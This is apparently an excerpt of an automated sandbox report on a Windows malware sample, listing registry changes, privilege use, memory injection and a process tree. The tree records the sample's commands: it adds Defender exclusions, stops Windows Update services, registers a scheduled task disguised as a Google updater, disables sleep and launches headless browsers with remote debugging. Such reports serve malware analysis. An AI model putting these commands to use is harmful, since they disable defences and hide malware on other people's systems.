Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4880 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4880 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4880 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4880 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4880 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4880 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4880 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4880 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4880 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 260 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 260 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4924 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4924 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 1896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2948 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4932 wrote to memory of 2024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=31791 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataZJNEU" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc00439758,0x7ffc00439768,0x7ffc00439778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1368 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1688 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=31791 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1984 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2336 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2516 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3096 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=31791 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3236 --field-trial-handle=1460,i,1291001564614772716,14794468224038354170,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=31871 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataTR6SP" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

